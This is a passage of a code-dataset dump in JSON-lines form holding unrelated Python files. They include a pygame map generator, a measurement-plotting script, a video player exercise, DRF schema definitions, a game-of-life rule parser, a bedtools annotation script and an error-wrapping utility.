((block.x == c * tileSize) and (block.y == r * tileSize) and not(tileFound)):\n                mapString += \"w\"\n                tileFound = True\n        if ((win.x == c * tileSize) and (win.y == r * tileSize) and not(tileFound)):\n            mapString += \"v\"\n            tileFound = True\n        if ((start.x == c * tileSize) and (start.y == r * tileSize) and not(tileFound)):\n            mapString += \"s\"\n            tileFound = True\n        if not(tileFound):\n            mapString += \" \"\n\n\nmapString += \"X\"\nprint(mapString)\nprint(len(mapString))\n\ncurrTile = 0\nscreen.blit(background, (0, 0))\n\ntiles = []\n\nfor r in range(totalRow):\n    for c in range(totalCol):\n        if mapString[c + (r * totalCol)] == \"w\":\n            tiles.append(tile(c * tileSize, r * tileSize, tileSize))\n            tiles[currTile].show()\n        elif mapString[c + (r * totalCol)] == \"s\":\n            start = startTile(c * tileSize, r * tileSize, tileSize)\n            start.show()\n        elif mapString[c + (r * totalCol)] == \"v\":\n            win = winTile(c * tileSize, r * tileSize, tileSize)\n            win.show()\n\n        currTile += 1\n\npygame.display.flip()\nmainloop = True\n\nwhile mainloop:\n    time.sleep(5)\n    mainloop = False\n","sub_path":"Map Generator/Grid Layer.py","file_name":"Grid Layer.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"156159994","text":"from __future__ import unicode_literals\nfrom uncertainties import *\nfrom converterNew import *\nfrom uncertainties import unumpy\nfrom uncertainties import *\nfrom uncertainties.umath import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport matplotlib\n\n##matplotlib.rcParams['text.usetex'] = True\n##matplotlib.rcParams['text.latex.unicode'] = True\nfrom matplotlib import rc\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n\n# all plots are saved in the \"Graphen\" folder\nif not os.path.exists(\"Graphen\"):\n    os.mkdir(\"Graphen\")\n\n# data contains all the information\n#data = np.array(convert(\"messwerteText\"))\n\n#data = convert(\"test\")\n\ndata = convert(\"Wärmepumpe\")\n#datael=convert(\"Leistung\")\ndataf=convert(\"fehler\")\n#print(data[0])\n\nm1=ufloat(4.36, 0.02)\nm2=ufloat(4.28, 0.02)\nm3=ufloat(0.36, 0.02)\nt1=ufloat(304.7187, 0.03)\nt2=ufloat(308.3056, 0.03)\nt3=ufloat(281.0657, 0.03)\nt4=ufloat(277.2301, 0.03)\nHk=ufloat(175.04, 
0.01)\nHh=ufloat(196.77,0.01)\n\nth=t2-t1\ntk=t3-t4\nmh=m1-m3\nmk=m2-m3\n\nmsh= (4182*th*mh)/(240.0 * Hh * 1000.0)\nprint(msh*60)\nmsk= (4182*tk*mk)/(240.0 * Hk * 1000.0)\nprint(msk*60)\nprint(mh)\nprint(mk)\nprint(tk)\nprint(th)\n\n# error analysis\ntimef = np.array(dataf[0],dtype=float) #ms\nChannel0f = np.array(dataf[8],dtype=float) #Kelvin\n#print(np.std(Channel0f)) #ca 0.03 Kelvin\n#timef=timef[0:500:]\n#Channel0f=Channel0f[0:500:]\n\n# temperature analysis\ntime = np.array(data[0],dtype=float) #ms\nChannel2 = np.array(data[3],dtype=float) #Kelvin\ntime=time[0::60]\nChannel2 =Channel2[0::60]\n\nChannel4 = np.array(data[5],dtype=float) #Kelvin\ntime=time[0::60]\nChannel4 =Channel4[0::60]\n\n#print(time/60)\n#print(Channel4)\n\n#time1 = np.array(data[0],dtype=float)\n#time=time[0::5]\n#Ufuse = np.array(data[2], dtype=float)\n#Ufuse=Ufuse[0::5]\n#Ubat = np.array(data[1], dtype=float)\n#Ubat=Ubat[0::5]\n\n\n###################\n#n*lambda/2 mbar\np=[]\npu=940\np0=[680,650,620,590,560,520,500,470,430,400,370,340,290,240,210,160,120,90,60]\n\nfor i in range(len(p0)):\n    p.append(pu-p0[i])\n\n\n#################\n\n\n\n# figures\nfig, ax = plt.subplots()\n#ax.plot(timef,Channel0f, color = 'red', marker='o', linestyle='', markersize = 1,label=r'$U_{Bat}$')\n#ax.plot(time,Ufuse, color = 'blue', marker='o', linestyle='', markersize = 1,label=r'$U_{Fuse}$')\n#ax.plot(time,Ubat-Ufuse,color = 'green', marker='o', linestyle='',markersize = 1,label=r'$U_{ConductivePath}$')\nax.legend(loc='upper left',frameon=True)\n#ax.set(xlabel='Time (ms)',ylabel='Voltage (V)')\nax.grid(True,linestyle='--',linewidth = 0.3)\n#plt.xlim(-70,2600)\n#plt.ylim(-0.2,5.5)\n\n#plt.hist(Channel0f, bins=5)\n\n\n#plt.xscale('log')\n#plt.title('test')\n\n#plt.errorbar(X, Y, yerr=0.1, fmt='ko', linewidth=0.8, capsize=3, capthick=0.8, markersize=5)\n\n#i='Voltage'\n#plt.savefig(\"Graphen/Temperature_\" + str(i) + \".png\")\n\n#plt.show()","sub_path":"PlottingGp-master/Wärmepumpe.py","file_name":"Wärmepumpe.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"106048270","text":"\"\"\"A video player class.\"\"\"\n\nfrom .video_library import VideoLibrary\nfrom .playlists import Playlists\nfrom .flag import Flagged\nfrom .video_playlist import VideoPlaylist\nfrom random import randint\n\n\nclass VideoPlayer:\n    \"\"\"A class used to represent a Video Player.\"\"\"\n\n    def __init__(self):\n        \"\"\"VideoPlayer Constructor\"\"\"\n        self._video_library = VideoLibrary()\n        self._playlists = Playlists()\n        self._flagged = Flagged()\n        self._curr_id = None\n        self._is_pause = False\n\n    def number_of_videos(self):\n        num_videos = len(self._video_library.get_all_videos())\n        print(f\"{num_videos} videos in the library\")\n\n\n    def show_all_videos(self):\n        \"\"\"Returns all videos.\"\"\"\n        print(\"Here's a list of all available videos:\")\n\n        # sort the video titles in ascending order\n        lst = self._video_library.get_all_videos()\n        lst.sort(key= lambda v: v.title)\n\n        for video in lst:\n            tags = \" \".join(video.tags)\n\n            if self._flagged.is_flag_video(video.video_id):\n                print(f\"{video.title} ({video.video_id}) [{tags}] - FLAGGED (reason: {self._flagged.get_flag_videos()[video.video_id]})\")\n            else:\n                print(f\"{video.title} ({video.video_id}) [{tags}]\")\n\n\n    def play_video(self, video_id):\n        \"\"\"Plays the respective video.\n\n        Args:\n            video_id: The video_id to be played.\n        \"\"\"\n        if 
self._video_library.get_video(video_id):\n\n            if self._flagged.is_flag_video(video_id):\n                print(f\"Cannot play video: Video is currently flagged (reason: {self._flagged.get_flag_videos()[video_id]})\")\n\n            else:\n                if self._curr_id != None:\n                    self.stop_video()\n\n                print(f\"Playing video: {self._video_library.get_video(video_id).title}\")\n                self._curr_id = video_id\n                self._is_pause = False\n\n        else:\n            print(\"Cannot play video: Video does not exist\")\n\n\n    def stop_video(self):\n        \"\"\"Stops the current video.\"\"\"\n        if self._curr_id == None:\n            print(\"Cannot stop video: No video is currently playing\")\n        else:\n            print(f\"Stopping video: {self._video_library.get_video(self._curr_id).title}\")\n            self._curr_id = None\n            self._is_pause = False\n\n\n    def play_random_video(self):\n        \"\"\"Plays a random video from the video library.\"\"\"\n\n        # all videos are flagged\n        if len(self._flagged.get_flag_videos()) == len(self._video_library.get_all_videos()):\n            print(\"No videos available\")\n\n        else:\n\n            # randomly pick a number\n            if self._curr_id:\n                self.stop_video()\n\n            num = randint(0, len(self._video_library.get_all_videos())-1)\n\n            self.play_video(self._video_library.get_all_videos()[num].video_id)\n\n\n    def pause_video(self):\n        \"\"\"Pauses the current video.\"\"\"\n        if self._is_pause:\n            print(f\"Video already paused: {self._video_library.get_video(self._curr_id).title}\")\n        else:\n            if self._curr_id:\n                print(f\"Pausing video: {self._video_library.get_video(self._curr_id).title}\")\n                self._is_pause = True\n            else:\n                print(\"Cannot pause video: No video is currently playing\")\n\n\n    def continue_video(self):\n        \"\"\"Resumes playing the current video.\"\"\"\n        if self._is_pause:\n            print(f\"Continuing video: {self._video_library.get_video(self._curr_id).title}\")\n        else:\n            if self._curr_id:\n                print(\"Cannot continue video: Video is not paused\")\n            else:\n                print(\"Cannot continue video: No video is currently playing\")\n\n\n    def show_playing(self):\n        \"\"\"Displays video currently playing.\"\"\"\n        if self._curr_id != None:\n            the_video = self._video_library.get_video(self._curr_id)\n            tags = \" \".join(the_video.tags)\n\n            if self._is_pause:\n                print(f\"Currently playing: {the_video.title} ({the_video.video_id}) [{tags}] - PAUSED\")\n\n            else: \n                print(f\"Currently playing: {the_video.title} ({the_video.video_id}) [{tags}]\")\n        else:\n            print(\"No video is currently playing\")\n\n\n    def create_playlist(self, playlist_name):\n        \"\"\"Creates a playlist with a given name.\n\n        Args:\n            playlist_name: The playlist name.\n        \"\"\"\n        if self._playlists.add_playlist(VideoPlaylist(playlist_name)):\n            print(f\"Successfully created new playlist: {playlist_name}\")\n        else:\n            print(f\"Cannot create playlist: A playlist with the same name already exists\")\n\n\n    def add_to_playlist(self, playlist_name, video_id):\n        \"\"\"Adds a video to a playlist with a given name.\n\n        Args:\n            playlist_name: The playlist name.\n            video_id: The video_id to be added.\n        \"\"\"\n        if self._playlists.get_playlist(playlist_name.lower()):\n\n            if self._flagged.is_flag_video(video_id):\n                print(f\"Cannot add video to {playlist_name}: Video is currently flagged (reason: {self._flagged.get_flag_videos()[video_id]})\")\n\n            else:\n                try:\n                    if self._playlists.get_playlist(playlist_name.lower()).add_to_content(video_id):\n                        print(f\"Added video to {playlist_name}: {self._video_library.get_video(video_id).title}\")\n                    else:\n                        print(f\"Cannot add video to {playlist_name}: Video already added\")\n                except:\n                    print(f\"Cannot add video to {playlist_name}: Video does not
 exist\")\n        else:\n            print(f\"Cannot add video to {playlist_name}: Playlist does not exist\")\n\n\n    def show_all_playlists(self):\n        \"\"\"Display all playlists.\"\"\"\n        if not self._playlists.number_of_playlists():\n            print(\"No playlists exist yet\")\n        else:\n            print(\"Showing all playlists:\")\n\n            # sort the playlist names in ascending order\n            lst = self._playlists.get_all_playlists()\n            lst.sort(key= lambda v: v.name)\n\n            for playlist in lst:\n                print(playlist.name)\n\n\n    def show_playlist(self, playlist_name):\n        \"\"\"Display all videos in a playlist with a given name.\n\n        Args:\n            playlist_name: The playlist name.\n        \"\"\"\n\n        try:\n            if not self._playlists.get_playlist(playlist_name).number_of_contents():\n                print(f\"Showing playlist: {playlist_name}\")\n                print(\"No videos here yet\")\n            else:\n                print(f\"Showing playlist: {playlist_name}\")\n                for content in self._playlists.get_playlist(playlist_name).get_content():\n\n                    # get the video from id\n                    video = self._video_library.get_video(content)\n\n                    tags = \" \".join(video.tags)\n\n                    # check if flagged\n                    if self._flagged.is_flag_video(video.video_id):\n                        print(f\"{video.title} ({video.video_id}) [{tags}] - FLAGGED (reason: {self._flagged.get_flag_videos()[video.video_id]})\")\n                    else:\n                        print(f\"{video.title} ({video.video_id}) [{tags}]\")\n        except:\n            print(f\"Cannot show playlist {playlist_name}: Playlist does not exist\")\n\n\n    def remove_from_playlist(self, playlist_name, video_id):\n        \"\"\"Removes a video from a playlist with a given name.\n\n        Args:\n            playlist_name: The playlist name.\n            video_id: The video_id to be removed.\n        \"\"\"\n        if self._playlists.get_playlist(playlist_name.lower()):\n\n            if not self._video_library.get_video(video_id):\n                print(f\"Cannot remove video from {playlist_name}: Video does not exist\")\n\n            else:\n                if not self._playlists.get_playlist(playlist_name.lower()).remove_from_content(video_id):\n                    print(f\"Cannot remove video from {playlist_name}: Video is not in playlist\")\n                else:\n                    print(f\"Removed video from {playlist_name}: {self._video_library.get_video(video_id).title}\")\n        else:\n            print(f\"Cannot remove video from {playlist_name}: Playlist does not exist\")\n\n\n    def clear_playlist(self, playlist_name):\n        \"\"\"Removes all videos from a playlist with a given name.\n\n        Args:\n            playlist_name: The playlist name.\n        \"\"\"\n        try:\n            self._playlists.get_playlist(playlist_name).remove_all_content()\n            print(f\"Successfully removed all videos from {playlist_name}\")\n        except:\n            print(f\"Cannot clear playlist {playlist_name}: Playlist does not exist\")\n\n\n    def delete_playlist(self, playlist_name):\n        \"\"\"Deletes a playlist with a given name.\n\n        Args:\n            playlist_name: The playlist name.\n        \"\"\"\n        try:\n            if self._playlists.remove_playlist(playlist_name):\n                print(f\"Deleted playlist: {playlist_name}\")\n            else:\n                print(f\"Cannot delete playlist {playlist_name}: Playlist does not exist\")\n        except:\n            print(f\"Cannot delete playlist {playlist_name}: Playlist does not exist\")\n\n\n    def search_videos(self, search_term):\n        \"\"\"Display all the videos whose titles contain the search_term.\n\n        Args:\n            search_term: The query to be used in search.\n        \"\"\"\n        lst = [i for i in self._video_library.get_all_videos() if (search_term.lower() in i.title.lower()) and (not self._flagged.is_flag_video(i.video_id))]\n\n        if len(lst):\n            print(f\"Here are the results for {search_term}:\")\n\n            for i in range(1,len(lst)+1):\n                tags = \" \".join(lst[i-1].tags)\n                print(f'{i}) {lst[i-1].title} ({lst[i-1].video_id}) [{tags}]')\n\n            print(\"Would you like 
to play any of the above? If yes, specify the number of the video.\")\n\n            print(\"If your answer is not a valid number, we will assume it's a no.\")\n\n            ans = input(\"\")\n\n            try:\n                if (int(ans) <= len(lst)) and (int(ans) > 0):\n                    self.play_video(lst[int(ans)-1].video_id)\n            except:\n                pass\n\n        else:\n            print(f\"No search results for {search_term}\")\n\n\n    def search_videos_tag(self, video_tag):\n        \"\"\"Display all videos whose tags contain the provided tag.\n\n        Args:\n            video_tag: The video tag to be used in search.\n        \"\"\"\n        lst = [i for i in self._video_library.get_all_videos() if (video_tag.lower() in [tag.lower() for tag in i.tags]) and (not self._flagged.is_flag_video(i.video_id))]\n\n        if len(lst):\n            print(f\"Here are the results for {video_tag}:\")\n\n            for i in range(1,len(lst)+1):\n                tags = \" \".join(lst[i-1].tags)\n                print(f'{i}) {lst[i-1].title} ({lst[i-1].video_id}) [{tags}]')\n\n            print(\"Would you like to play any of the above? If yes, specify the number of the video.\")\n\n            print(\"If your answer is not a valid number, we will assume it's a no.\")\n\n            ans = input(\"\")\n\n            try:\n                if (int(ans) <= len(lst)) and (int(ans) > 0):\n                    self.play_video(lst[int(ans)-1].video_id)\n            except:\n                pass\n\n        else:\n            print(f\"No search results for {video_tag}\")\n\n\n    def flag_video(self, video_id, flag_reason=\"Not supplied\"):\n        \"\"\"Mark a video as flagged.\n\n        Args:\n            video_id: The video_id to be flagged.\n            flag_reason: Reason for flagging the video.\n        \"\"\"\n        if self._video_library.get_video(video_id):\n\n            if self._curr_id == video_id:\n                self.stop_video()\n\n            if self._flagged.add_flag_video(video_id, flag_reason):\n                print(f\"Successfully flagged video: {self._video_library.get_video(video_id).title} (reason: {flag_reason})\")\n            else:\n                print(\"Cannot flag video: Video is already flagged\")\n        else:\n            print(\"Cannot flag video: Video does not exist\")\n\n\n    def allow_video(self, video_id):\n        \"\"\"Removes a flag from a video.\n\n        Args:\n            video_id: The video_id to be allowed again.\n        \"\"\"\n        if self._flagged.is_flag_video(video_id):\n            self._flagged.remove_flag(video_id)\n            print(f\"Successfully removed flag from video: {self._video_library.get_video(video_id).title}\")\n        else:\n            if self._video_library.get_video(video_id):\n                print(\"Cannot remove flag from video: Video is not flagged\")\n\n            else:\n                print(\"Cannot remove flag from video: Video does not exist\")\n","sub_path":"python/src/video_player.py","file_name":"video_player.py","file_ext":"py","file_size_in_byte":12842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"195340455","text":"from random import randint\r\nimport numpy as np\r\nK = np.random.randint(0, 3)\r\nN, M = 5, 8\r\nA = [[randint(-10, 10) for j in range(M)] for i in range(N)]\r\nA = np.array(A)\r\nprint(\"Matrix:\\r\\n{}\".format(A))\r\n\r\nprint(\"K = \" + str(K))\r\nA = np.delete(A, (K-1), axis=1)\r\nprint(\"New matrix:\\r\\n{}\\n\".format(A))\r\n","sub_path":"2 часть/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"317273192","text":"from drf_spectacular.types import OpenApiTypes\nfrom drf_spectacular.utils import OpenApiParameter, extend_schema\n\nfrom events.core.schemas.reusable import bad_request_serializer, forbidden_request_serializer\nfrom events.core.serializers import ListEventSerializer, ListInvitationSerializer, ListUserSerializer\n\nDELETE_USER = extend_schema(\n    description=\"remove a 
friendship\",\n    responses={\n        \"200\": None,\n        \"400\": bad_request_serializer,\n        \"403\": forbidden_request_serializer,\n        \"404\": bad_request_serializer,\n    },\n)\n\nACCOUNT_ACTIVATION_USER = extend_schema(\n    description=\"activate a user account\",\n    parameters=[\n        OpenApiParameter(\"uid\", OpenApiTypes.UUID, OpenApiParameter.PATH),\n        OpenApiParameter(\"token\", OpenApiTypes.STR, OpenApiParameter.PATH),\n    ],\n    responses={\n        \"200\": None,\n        \"400\": bad_request_serializer,\n    },\n)\n\nEVENT_INVITATIONS_USER = extend_schema(\n    description=\"return all invitations of type EV (Event)\",\n    responses={\n        \"200\": ListInvitationSerializer,\n        \"404\": forbidden_request_serializer,\n    },\n)\n\nFRIENDS_USER = extend_schema(\n    description=\"return all friends\",\n    responses={\n        \"200\": ListUserSerializer,\n        \"404\": forbidden_request_serializer,\n    },\n)\n\nFRIENDSHIP_INVITATIONS_USER = extend_schema(\n    description=\"return all invitations of type FS (Friendship)\",\n    responses={\n        \"200\": ListInvitationSerializer,\n        \"404\": forbidden_request_serializer,\n    },\n)\n\nMY_EVENTS_USER = extend_schema(\n    description=\"return all events that the user owns or participates in\",\n    responses={\n        \"200\": ListEventSerializer,\n        \"404\": forbidden_request_serializer,\n    },\n)\n\nREJECTED_EVENTS_USER = extend_schema(\n    description=\"return all events that the user rejected\",\n    responses={\n        \"200\": ListInvitationSerializer,\n        \"404\": forbidden_request_serializer,\n    },\n)\n","sub_path":"events/core/schemas/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"127886158","text":"# Fernando Valadez-Nunez\n# 02/27/2020\n\n\n# Problem 4\n# Write a Python function that takes a list of numbers and returns a new list\n# with unique elements of the first list. 
Use list [1, 3, 3, 3, 6, 2, 3, 5].\n\n# Use the append function.\n\ndef unique(mylist):\n    # build and return a new list that keeps only the first occurrence of each value\n    unique_list = []\n    for x in mylist:\n        if x not in unique_list:\n            unique_list.append(x)\n    return unique_list\n\nmylist = [1, 3, 3, 3, 6, 2, 3, 5]\nprint(\"The unique values from the list are\")\nprint(*unique(mylist))\n","sub_path":"Problem4Unique.py","file_name":"Problem4Unique.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"255440913","text":"'''\nAuthor: Puffrora\nDate: 2021-09-12 01:41:04\nLastModifiedBy: Puffrora\nLastEditTime: 2021-09-12 02:01:37\n'''\n\nfrom typing import List\n\nclass FindSumPairs:\n\n    def __init__(self, nums1: List[int], nums2: List[int]):\n        from collections import Counter\n        self.nums1 = nums1\n        self.nums2 = nums2\n        self.counter = Counter(nums2)\n\n    def add(self, index: int, val: int) -> None:\n        n2 = self.nums2[index]\n        self.counter[n2] -= 1\n        self.counter[n2+val] += 1\n\n        self.nums2[index] += val\n\n    def count(self, tot: int) -> int:\n        res = 0\n        for n1 in self.nums1:\n            res += self.counter[tot-n1]\n        return res\n\n\n# Your FindSumPairs object will be instantiated and called as such:\n# obj = FindSumPairs(nums1, nums2)\n# obj.add(index,val)\n# param_2 = obj.count(tot)","sub_path":"Leetcode/leetcode1865 找出和为指定值的下标对.py","file_name":"leetcode1865 找出和为指定值的下标对.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"505768675","text":"\nfrom django import template\nfrom corpora.utils.tmp_files import get_file_url\nimport logging\nlogger = logging.getLogger('corpora')\n\nregister = template.Library()\n\n\n@register.filter()\ndef access_url(file):\n    '''Takes a file object and returns the S3 signed url'''\n    if file:\n        if 'http' in file.url:\n            return get_file_url(file, expires=60*60)\n        else:\n            return file.url\n","sub_path":"corpora/transcription/templatetags/file_access.py","file_name":"file_access.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"345386780","text":"\"\"\"\n# Copyright 1999-2005 Gentoo Foundation\n# This source code is distributed under the terms of version 2 of the GNU\n# General Public License as published by the Free Software Foundation, a copy\n# of which can be found in the main directory of this project.\nGentoo Linux Installer Test Suite\n$Header: /var/cvsroot/gentoo/src/installer/src/tests/test_GLI_InstallProfile.py,v 1.5 2005/08/22 18:35:52 codeman Exp $\n\"\"\"\n\nimport unittest\nimport os\nimport GLIInstallProfile\n\nclass test_GLIInstallProfile (unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.failUnless(os.path.exists(\"GLIInstallProfile.py\"), \"Please run tests from src\")\n\n\tdef testInstantiate(self):\n\t\tprofile = GLIInstallProfile.InstallProfile()\n\n\t\tself.failUnless(profile, \"Could not instantiate InstallProfile\")\n\n\tdef testParse(self):\n\t\tprofile = GLIInstallProfile.InstallProfile()\n\n\t\tself.failUnless(profile, \"Could not instantiate InstallProfile\")\n\n\t\tpath = os.getcwd()\n\t\tpath = os.path.join(path, \"tests\", \"gli_test_profile.xml\")\n\n\t\tprofile.parse(\"file://\" + path)\n\n\t\tself.assertEqual(profile.get_time_zone(), \"GMT\")\n\nif __name__ == 
'__main__':\n\tunittest.main()\n","sub_path":"pinstaller/trunk/tests/test_GLI_InstallProfile.py","file_name":"test_GLI_InstallProfile.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207812685","text":"import operator\nfrom typing import Dict, Union, Any, List\n\nfrom gol.common import Grid, Point2D\nfrom gol.rules_parser.comparison import Comparison\n\n\nBOOL_OPERATORS = {\n 'and': operator.and_,\n 'or': operator.or_,\n}\n\n\nclass BoolOperator:\n def __init__(self, operator: str,\n operands: List[Union[Comparison, 'BoolOperator']]):\n assert operator in BOOL_OPERATORS\n\n self.operands = operands\n self.operator = BOOL_OPERATORS[operator]\n self.operator_text = operator\n\n def __str__(self):\n return '(' + (' '+self.operator_text+' ').\\\n join([str(op) for op in self.operands]) + ')'\n\n def __repr__(self):\n return 'BoolOperator(' + (' '+self.operator_text+' ').\\\n join([str(op) for op in self.operands]) + ')'\n\n def web_repr(self):\n return {\n 'className': 'BoolOperator',\n 'args': ([self.operator_text] +\n [op.web_repr() for op in self.operands]),\n }\n\n def __call__(self, grid: Grid, pos: Point2D,\n global_config: Dict[str, Any]) -> bool:\n if self.operator == operator.and_:\n for operand in self.operands:\n if not operand(grid, pos, global_config):\n return False\n return True\n elif self.operator == operator.or_:\n for operand in self.operands:\n if operand(grid, pos, global_config):\n return True\n return False\n\n assert False, 'Invalid operator in evaluation!'\n\n\ndef parse_bool_expr(p):\n p_ = p[0]\n if len(p_) == 1:\n return p_\n\n operands = [p_[i] for i in range(0, len(p_), 2)]\n return BoolOperator(p_[1], operands)\n","sub_path":"gol/rules_parser/bool_operator.py","file_name":"bool_operator.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"161566096","text":"# from __future__ import absolute_import\n\nimport sys\n\nimport os\nimport os.path\nimport argparse\nfrom collections import defaultdict, OrderedDict\n\nimport numpy as np\nimport numpy.random as rand\nimport re\n\nimport pybedtools as pbt\n\nimport pandas as pd\n\nfrom makeamip.capcommon import *\n\nif __name__ == '__main__':\n \n opts = argparse.ArgumentParser()\n \n opts.add_argument('--inTbl', dest='inTbl')\n opts.add_argument('--colChrom', dest='colChrom')\n opts.add_argument('--colStart', dest='colStart')\n opts.add_argument('--colEnd', dest='colEnd')\n\n opts.add_argument('--outTbl',dest='outTbl')\n opts.add_argument('--colOutTarget',dest='colOutTarget')\n\n opts.add_argument('--inBedTargets', dest='inBedTargets')\n\n o = opts.parse_args()\n\n tbl = pd.read_csv(o.inTbl,sep='\\t')\n tbl[o.colOutTarget]=''\n\n btTbl = tbl[ ['chrom','start','end'] ].copy()\n btTbl['name'] = btTbl.index\n btTbl = pbt.BedTool.from_dataframe( btTbl )\n\n btTargets = pbt.BedTool(o.inBedTargets)\n tblTargets = \\\n pd.DataFrame( {'chrom': [iv.chrom for iv in btTargets],\n 'start': [iv.start for iv in btTargets],\n 'end': [iv.end for iv in btTargets],\n 'name': range(len(btTargets)) } )\n tblTargets=tblTargets[ ['chrom','start','end','name'] ]\n btTargets = pbt.BedTool.from_dataframe( tblTargets )\n\n probesToTgts = btTbl.intersect( btTargets, wa=True, wb=True )\n probesToTgts = pd.DataFrame( [iv.fields for iv in probesToTgts ] )\n probesToTgts = probesToTgts.convert_objects(convert_numeric=True)\n\n # group by 3 = id of probe. 
join 7 (id(s) of targets)\nz=probesToTgts[[3,7]].groupby(3).agg( lambda g:str(','.join( [str(v) for v in g[7]] )))\n\n    tbl.loc[ z.index, o.colOutTarget] = z[7]\n    tbl.to_csv( o.outTbl, sep='\\t', index=False )\n","sub_path":"makeamip/annotate_miptbl_with_target.py","file_name":"annotate_miptbl_with_target.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"273495713","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Problem 2\n\n# In[6]:\n\n\nimport sympy as sp\n\n\n# In[23]:\n\n\nAx=2\nAy=0\n\ntheta=sp.Symbol('theta',real=True)\nP1x=5*sp.cos(2*theta)\nP1y=5*sp.sin(2*theta)\nP2x=10*sp.cos(theta)\nP2y=10*sp.sin(theta)\n\narea_AP1P2=((P1x-Ax)*(P2y-Ay)-(P1y-Ay)*(P2x-Ax))/2\narea_AP1P2=sp.trigsimp(area_AP1P2)\narea_AP1P2_diff=sp.diff(area_AP1P2,theta)\nresults=sp.solve(area_AP1P2_diff,theta)\n\nanswers=[]\nfor i in results:\n    tmp=area_AP1P2.subs(theta,i)\n    answers.append(tmp)\n\nprint('The maximum of △AP1P2 is ',sp.trigsimp(max(answers)))\n\n","sub_path":"0527/2200104039/Question2.py","file_name":"Question2.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"535446686","text":"# Copyright (c) 2009 Denis Bilenko. See LICENSE for details.\n__all__ = ['wrap_errors']\n\nimport sys\nimport traceback\n\nimport logging\n_log = logging.getLogger(__name__)\nch = logging.StreamHandler()\n_log.addHandler(ch)\n\nclass Log(object):\n\n    def __init__(self, log='default'):\n        if log == 'default':\n            self._log = _log\n        else:\n            self._log = log\n\n    def __getattr__(self, name):\n        if len(logging.root.handlers) > 0:\n            if name == 'log':\n                if isinstance(self._log, logging.Logger):\n                    return self.log_logging\n                else:\n                    return self.log_stderr\n            else:\n                return self.log_stderr\n        raise AttributeError()\n\n    def log_logging(self, msg):\n        if not isinstance(self._log, logging.Logger):\n            self.log_stderr(msg)\n            return\n        self._log.warning(msg)\n\n    def log_stderr(self, msg):\n        msg = \"%s\\n\" % msg\n        sys.stderr.write(msg)\n\n    def exception(self, msg):\n        # self._log must be a Logger instance (logging.getLogger is a\n        # function, so it cannot be used as an isinstance() target)\n        if not isinstance(self._log, logging.Logger):\n            traceback.print_exc()\n            return\n        self._log.exception(msg)\n\nclass wrap_errors(object):\n    \"\"\"Helper to make function return an exception, rather than raise it.\n\n    Because every exception that is unhandled by greenlet will be logged,\n    it is desirable to prevent non-error exceptions from leaving a greenlet.\n    This can be done with a simple ``try``/``except`` construct::\n\n        def wrapped_func(*args, **kwargs):\n            try:\n                return func(*args, **kwargs)\n            except (A, B, C), ex:\n                return ex\n\n    :class:`wrap_errors` provides a shortcut to write that in one line::\n\n        wrapped_func = wrap_errors((A, B, C), func)\n\n    It also preserves ``__str__`` and ``__repr__`` of the original function.\n    \"\"\"\n    # QQQ could also support using wrap_errors as a decorator\n\n    def __init__(self, errors, func):\n        \"\"\"Make a new function from `func', such that it catches `errors' (an\n        Exception subclass, or a tuple of Exception subclasses) and return\n        it as a value.\n        \"\"\"\n        self.errors = errors\n        self.func = func\n\n    def __call__(self, *args, **kwargs):\n        func = self.func\n        try:\n            return func(*args, **kwargs)\n        except self.errors:\n            return sys.exc_info()[1]\n\n    def __str__(self):\n        return str(self.func)\n\n    def __repr__(self):\n        return repr(self.func)\n\n    def __getattr__(self, item):\n        return getattr(self.func, 
